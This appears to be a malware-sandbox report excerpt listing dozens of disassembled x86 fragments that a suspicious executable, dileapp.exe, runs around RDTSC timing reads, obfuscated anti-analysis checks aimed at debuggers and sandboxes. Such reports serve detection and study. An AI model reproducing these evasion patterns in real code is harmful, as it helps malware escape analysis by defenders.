                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B7302 second address: 11B7353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 32357646h 0x0000000e mov dl, ah 0x00000010 push 00000003h 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FCCB0D02D08h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov cx, A4EFh 0x00000032 push 00000003h 0x00000034 xor dword ptr [ebp+13763676h], edx 0x0000003a push B7BDBA2Fh 0x0000003f push ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FCCB0D02D0Dh 0x00000047 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B7454 second address: 11B74D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D0Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 4FFF7F21h 0x00000013 or edx, 744D09E7h 0x00000019 push 00000003h 0x0000001b mov dword ptr [ebp+1376B64Bh], edx 0x00000021 mov edx, dword ptr [ebp+13762C74h] 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007FCCB0D02D08h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 mov dword ptr [ebp+13762DB2h], edx 0x00000049 push 00000003h 0x0000004b jmp 00007FCCB0D02D12h 0x00000050 mov esi, dword ptr [ebp+1376375Fh] 0x00000056 push 7E2282CDh 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B74D5 second address: 11B750E instructions: 0x00000000 rdtsc 0x00000002 je 00007FCCB0D02D08h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 41DD7D33h 0x00000013 mov edi, 4C09BFCFh 0x00000018 lea ebx, dword ptr [ebp+138F1FD2h] 0x0000001e pushad 0x0000001f mov dword ptr [ebp+1376310Bh], eax 0x00000025 mov esi, dword ptr [ebp+137621E6h] 0x0000002b popad 0x0000002c mov dword ptr [ebp+13763676h], edi 0x00000032 push eax 0x00000033 pushad 0x00000034 pushad 0x00000035 push eax 0x00000036 pop eax 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11B750E second address: 11B7529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCCB120DFE4h 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11C9722 second address: 11C973C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCCB0D02D16h 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11C973C second address: 11C975C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jnl 00007FCCB120DFD6h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D6AA5 second address: 11D6ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCCB120DFDAh 0x0000000b popad 0x0000000c jc 00007FCCB120DFDCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D6ABE second address: 11D6AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FCCB0D02D08h 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D6AD1 second address: 11D6AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFDCh 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D74AA second address: 11D74E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCCB0D02D0Ch 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007FCCB0D02D06h 0x00000010 popad 0x00000011 jmp 00007FCCB0D02D0Eh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jng 00007FCCB0D02D0Ch 0x00000020 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D76A1 second address: 11D76B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D0Ch 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D7831 second address: 11D785B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D15h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCCB0D02D0Bh 0x0000000e js 00007FCCB0D02D06h 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11CAD3B second address: 11CAD51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D0Ch 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11CAD51 second address: 11CAD78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCCB120DFE2h 0x00000009 jmp 00007FCCB120DFE1h 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1195A1C second address: 1195A42 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCCB0D02D18h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCCB0D02D0Ah 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D83FE second address: 11D8408 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB120DFD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11D86B3 second address: 11D86C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jne 00007FCCB120DFD6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E398F second address: 11E399E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D0Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E654E second address: 11E655C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCCB120DFD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E655C second address: 11E65A5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jo 00007FCCB0D02D08h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FCCB0D02D12h 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c js 00007FCCB0D02D2Ah 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FCCB0D02D18h 0x00000029 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E65A9 second address: 11E65F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FCCB0D02D08h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 mov di, bx 0x00000024 push 907B0369h 0x00000029 push eax 0x0000002a push edx 0x0000002b jne 00007FCCB0D02D1Ch 0x00000031 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6906 second address: 11E6914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FCCB120DFD6h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6A9D second address: 11E6AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FCCB0D02D06h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E7409 second address: 11E741D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FCCB120DFD8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E76F9 second address: 11E7703 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB120DFD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E7703 second address: 11E7724 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FCCB0D02D14h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E8787 second address: 11E8817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCCB0D02D06h 0x0000000a popad 0x0000000b pop edx 0x0000000c push eax 0x0000000d pushad 0x0000000e jl 00007FCCB0D02D0Ch 0x00000014 jnp 00007FCCB0D02D06h 0x0000001a jp 00007FCCB0D02D0Ch 0x00000020 popad 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FCCB0D02D08h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 0000001Ch 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c jmp 00007FCCB0D02D14h 0x00000041 pushad 0x00000042 mov dh, 60h 0x00000044 mov dword ptr [ebp+13762927h], edi 0x0000004a popad 0x0000004b push 00000000h 0x0000004d mov edi, ecx 0x0000004f push 00000000h 0x00000051 mov dword ptr [ebp+13761905h], ecx 0x00000057 xchg eax, ebx 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FCCB0D02D16h 0x00000060 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E8817 second address: 11E884A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCCB120DFD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FCCB120DFE9h 0x00000010 jmp 00007FCCB120DFE3h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jbe 00007FCCB120DFDCh 0x0000001f jne 00007FCCB120DFD6h 0x00000025 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E884A second address: 11E8854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FCCB0D02D06h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E9860 second address: 11E986D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FCCB120DFD6h 0x0000000d rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EA327 second address: 11EA34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 mov esi, dword ptr [ebp+137631DCh] 0x0000000e push 00000000h 0x00000010 stc 0x00000011 push 00000000h 0x00000013 sub si, 2CDCh 0x00000018 sub esi, 6470F37Ah 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007FCCB0D02D06h 0x00000028 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EE690 second address: 11EE6A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FCCB0D02D08h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F084F second address: 11F0884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 ja 00007FCCB120DFD6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov dword ptr [ebp+138EBA35h], ecx 0x00000015 push 00000000h 0x00000017 adc di, 33BBh 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+13763641h], ecx 0x00000024 sbb ebx, 1EC5F118h 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c pushad 0x0000002d jp 00007FCCB120DFD6h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F195D second address: 11F196F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FCCB0D02D08h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11FD54C second address: 11FD5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FCCB120DFDCh 0x0000000d nop 0x0000000e xor ebx, dword ptr [ebp+138F784Dh] 0x00000014 push 00000000h 0x00000016 jng 00007FCCB120DFD9h 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007FCCB120DFD8h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 jmp 00007FCCB120DFE1h 0x0000003d push eax 0x0000003e pushad 0x0000003f push esi 0x00000040 ja 00007FCCB120DFD6h 0x00000046 pop esi 0x00000047 push eax 0x00000048 push edx 0x00000049 push ecx 0x0000004a pop ecx 0x0000004b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11ECADB second address: 11ECAE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FCCB120DFD6h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F0B19 second address: 11F0B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FCCB120DFD6h 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F7253 second address: 11F72E8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FCCB120DFD8h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov ebx, ecx 0x00000027 push dword ptr fs:[00000000h] 0x0000002e mov edi, dword ptr [ebp+138EDD63h] 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b cmc 0x0000003c mov eax, dword ptr [ebp+13760BC5h] 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FCCB120DFD8h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 0000001Dh 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c jmp 00007FCCB120DFE8h 0x00000061 push FFFFFFFFh 0x00000063 sub dword ptr [ebp+137636B9h], edx 0x00000069 push eax 0x0000006a pushad 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1225846 second address: 122585B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFDDh 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122585B second address: 1225871 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCCB0D02D0Eh 0x0000000d rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1226FCC second address: 1226FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCCB120DFD6h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007FCCB120DFE3h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122EAAC second address: 122EAD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D16h 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007FCCB0D02D06h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jnc 00007FCCB0D02D06h 0x0000001c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122EAD9 second address: 122EAEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FCCB120DFE6h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 122EDAD second address: 122EDC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDBh 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FCCB120DFD6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11A1511 second address: 11A151B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCCB120DFD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11A151B second address: 11A1529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007FCCB0D02D06h 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E570F second address: 11E573D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jc 00007FCCB0D02D23h 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007FCCB0D02D06h 0x0000001b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E58FA second address: 11E5953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push esi 0x0000000d add dword ptr [ebp+13762E04h], esi 0x00000013 pop edx 0x00000014 mov dx, ax 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FCCB120DFD8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 pushad 0x00000034 add dword ptr [ebp+137636D8h], ebx 0x0000003a mov dx, 2C04h 0x0000003e popad 0x0000003f mov dword ptr [ebp+138EFB4Bh], esi 0x00000045 nop 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5957 second address: 11E5974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5974 second address: 11E5999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCCB0D02D12h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jo 00007FCCB0D02D08h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6016 second address: 11E6026 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCCB0D02D0Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6026 second address: 11E6073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 je 00007FCCB120DFE2h 0x0000000f jg 00007FCCB120DFDCh 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push edx 0x0000001b jmp 00007FCCB120DFE0h 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FCCB120DFE9h 0x00000028 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6171 second address: 11E6183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E6183 second address: 11E61D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a movsx ecx, dx 0x0000000d lea eax, dword ptr [ebp+1391FB0Dh] 0x00000013 sbb dx, 5D33h 0x00000018 mov di, si 0x0000001b nop 0x0000001c push ecx 0x0000001d jnp 00007FCCB120DFDCh 0x00000023 pop ecx 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jmp 00007FCCB120DFE8h 0x0000002d push edx 0x0000002e pop edx 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233527 second address: 1233552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCCB120DFDDh 0x0000000b popad 0x0000000c jns 00007FCCB120DFDEh 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edx 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123355E second address: 123357E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FCCB0D02D08h 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCCB0D02D11h 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233AD7 second address: 1233AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFE3h 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C46 second address: 1233C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FCCB120DFDAh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C5B second address: 1233C7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D11h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FCCB0D02D06h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1233C7B second address: 1233C90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCCB120DFDAh 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1236D92 second address: 1236DA9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCCB0D02D0Ch 0x00000008 je 00007FCCB0D02D06h 0x0000000e push ebx 0x0000000f jnl 00007FCCB0D02D06h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1239515 second address: 1239536 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB0D02D06h 0x00000008 jmp 00007FCCB0D02D0Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f js 00007FCCB0D02D0Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
